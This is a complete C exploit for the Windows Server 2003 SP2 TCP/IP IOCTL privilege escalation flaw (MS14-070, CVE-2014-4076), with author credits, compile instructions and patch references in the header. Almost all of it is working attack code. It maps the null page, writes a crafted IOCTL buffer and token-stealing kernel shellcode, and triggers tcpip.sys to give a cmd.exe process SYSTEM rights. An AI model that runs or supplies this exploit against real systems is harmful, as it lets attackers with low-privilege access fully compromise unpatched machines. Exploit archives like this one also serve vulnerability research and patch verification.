/*
################################################################
# Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070)
# Date: 2015-08-10
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows 2003 SP2 x86
# Tested on:
# Windows 2003 SP2 x86 EN
# CVE ID: 2014-4076
# OSVDB-ID: 114532
################################################################
# Vulnerability description:
# Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to
# properly handle objects in memory during IOCTL processing.
# By crafting an input buffer that will be passed to the TCP
# device through the DeviceIoControlFile() function, it is
# possible to trigger a vulnerability that would allow an
# attacker to elevate privileges.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# - upon exiting the SYSTEM shell, the parent process
# will become unresponsive/hang
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2989935 not installed)
################################################################
# Patch:
# https://www.microsoft.com/en-us/download/details.aspx?id=44646
################################################################
# Thanks to:
# KoreLogic (Python PoC)
# ChiChou (C++ PoC)
################################################################
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076
# https://technet.microsoft.com/library/security/ms14-070
# https://www.exploit-db.com/exploits/35936/
# https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp
# https://www.osronline.com/article.cfm?article=229
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS WINAPI NtQuerySystemInformation (
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG);
NTSTATUS (WINAPI *ZwAllocateVirtualMemory) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
NTSTATUS (WINAPI *ZwDeviceIoControlFile) (
HANDLE FileHandle,
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
startupInformation->cb = sizeof (STARTUPINFO);
ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
// Start the child process.
return CreateProcess (
NULL, // No module name (use command line)
"c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32", // Start cmd.exe
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
TRUE, // Set handle inheritance to TRUE
0, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&startupInformation[0], // Pointer to STARTUPINFO structure
&processInformation[0] // Pointer to PROCESS_INFORMATION structure
);
}
unsigned long SwapBytes (unsigned long inputByteUL)
{
return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) +
((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24));
}
BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
{
int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5;
returnAllocMemValue1 = WriteProcessMemory (
(HANDLE) 0xFFFFFFFF,
(LPVOID) 0x28,
"\x87\xff\xff\x38",
4,
NULL
);
returnAllocMemValue2 = WriteProcessMemory (
(HANDLE) 0xFFFFFFFF,
(LPVOID) 0x38,
"\x00\x00",
2,
NULL
);
returnAllocMemValue3 = WriteProcessMemory (
(HANDLE) 0xFFFFFFFF,
(LPVOID) 0x1100,
&exploitBuffer[0],
32,
NULL
);
returnAllocMemValue4 = WriteProcessMemory (
(HANDLE) 0xFFFFFFFF,
(LPVOID) 0x2b,
"\x00\x00",
2,
NULL
);
returnAllocMemValue5 = WriteProcessMemory (
(HANDLE) 0xFFFFFFFF,
(LPVOID) 0x2000,
&shellcode[0],
96,
NULL
);
if (returnAllocMemValue1 == 0 ||
returnAllocMemValue2 == 0 ||
returnAllocMemValue3 == 0 ||
returnAllocMemValue4 == 0 ||
returnAllocMemValue5 == 0)
return FALSE;
else
return TRUE;
}
int main (void)
{
fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
fprintf (stderr, " [*] by Tomislav Paskalev\n");
fflush (stderr);
////////////////////////////////
// CREATE NEW CME.EXE PROCESS
////////////////////////////////
STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO));
PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION));
if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
{
fprintf (stderr, "[-] Creating a new process failed\n");
fprintf (stderr, " [*] Error code : %d\n", GetLastError());
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] Created a new cmd.exe process\n");
fflush (stderr);
////////////////////////////////
// CONVERT PID TO HEX LE
////////////////////////////////
unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
fprintf (stderr, " [*] PID [dec] : %#8lu\n", (unsigned long) processInformation->dwProcessId);
fprintf (stderr, " [*] PID [hex] : %#010x\n", (unsigned long) processInformation->dwProcessId);
fprintf (stderr, " [*] PID [hex LE] : %#010x\n", pidLittleEndian);
/*four bytes of hex = 8 characters, plus NULL terminator*/
unsigned char pidLittleEndianString[9];
sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);
////////////////////////////////
// CREATE SHELLCODE
////////////////////////////////
unsigned char exploitBuffer[] =
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
"\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
unsigned char shellcode[] =
"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
"\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
"\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
"\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
"\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
"\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
int counter;
for (counter = 0; counter < 4; counter++)
{
char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0};
shellcode[46 + counter] = strtol (buffer, NULL, 16);
}
shellcode[77] = strtol ("39", NULL, 16);
shellcode[78] = strtol ("ff", NULL, 16);
shellcode[79] = strtol ("a2", NULL, 16);
shellcode[80] = strtol ("ba", NULL, 16);
shellcode[82] = strtol ("0", NULL, 16);
shellcode[83] = strtol ("0", NULL, 16);
shellcode[84] = strtol ("0", NULL, 16);
shellcode[85] = strtol ("0", NULL, 16);
fprintf (stderr, "[+] Modified shellcode\n");
fflush (stderr);
////////////////////////////////
// CREATE HANDLE ON TCPIP.SYS
////////////////////////////////
HANDLE tcpIPDeviceHandle = CreateFileA (
"\\\\.\\Tcp",
0,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Opening TCP/IP I/O dev failed\n");
printf (" [*] Error code : %d\n", GetLastError());
ExitProcess (1);
}
fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
fflush (stderr);
////////////////////////////////
// ALLOCATE MEMORY - FIRST PAGE
////////////////////////////////
FARPROC ZwAllocateVirtualMemory;
ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
fflush (stderr);
NTSTATUS AllocMemReturnCode;
ULONG BaseAddress = 0x1000, RegionSize = 0x4000;
AllocMemReturnCode = ZwAllocateVirtualMemory (
(HANDLE) 0xFFFFFFFF,
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (AllocMemReturnCode != 0)
{
printf ("[-] Allocating memory failed\n");
printf (" [*] Error code : %#X\n", AllocMemReturnCode);
ExitProcess (1);
}
fprintf (stderr, "[+] Allocated memory\n");
fprintf (stderr, " [*] BaseAddress : 0x%p\n", BaseAddress);
fprintf (stderr, " [*] RegionSize : %#010x\n", RegionSize);
fflush (stderr);
////////////////////////////////
// WRITE EXPLOIT TO PROCESS MEM
////////////////////////////////
fprintf (stderr, "[*] Writing exploit...\n");
fflush (stderr);
if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
{
fprintf (stderr, " [-] Failed to write to memory\n");
fprintf (stderr, " [*] Err code : %d\n", GetLastError ());
fflush (stderr);
ExitProcess (1);
}
else
{
fprintf (stderr, " [+] done\n");
fflush (stderr);
}
////////////////////////////////
// SEND EXPLOIT TO TCPIP.SYS
////////////////////////////////
fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
fprintf (stderr, " [*] Parent proc hangs on exit\n");
fflush (stderr);
FARPROC ZwDeviceIoControlFile;
NTSTATUS DevIoCtrlReturnCode;
ULONG ioStatus = 8;
ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
DevIoCtrlReturnCode = ZwDeviceIoControlFile (
tcpIPDeviceHandle,
NULL,
NULL,
NULL,
(PIO_STATUS_BLOCK) &ioStatus,
0x00120028, //Device: NETWORK (0x12)
//Function: 0xa
//Access: FILE_ANY_ACCESS
//Method: METHOD_BUFFERED
(PVOID) 0x1100, //NULL, //Test
32, //0, //Test
NULL,
0
);
if (DevIoCtrlReturnCode != 0)
{
fprintf (stderr, " [-] Exploit failed (->TCP/IP)\n");
fprintf (stderr, " [*] Err code : %d\n", GetLastError ());
fflush (stderr);
ExitProcess (1);
}
////////////////////////////////
// WAIT FOR CHILD PROCESS; EXIT
////////////////////////////////
// Wait until child process exits.
WaitForSingleObject (processInformation->hProcess, INFINITE);
fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
fflush (stderr);
// Close process and thread handles.
CloseHandle (tcpIPDeviceHandle);
CloseHandle (processInformation->hProcess);
CloseHandle (processInformation->hThread);
return 1;
}
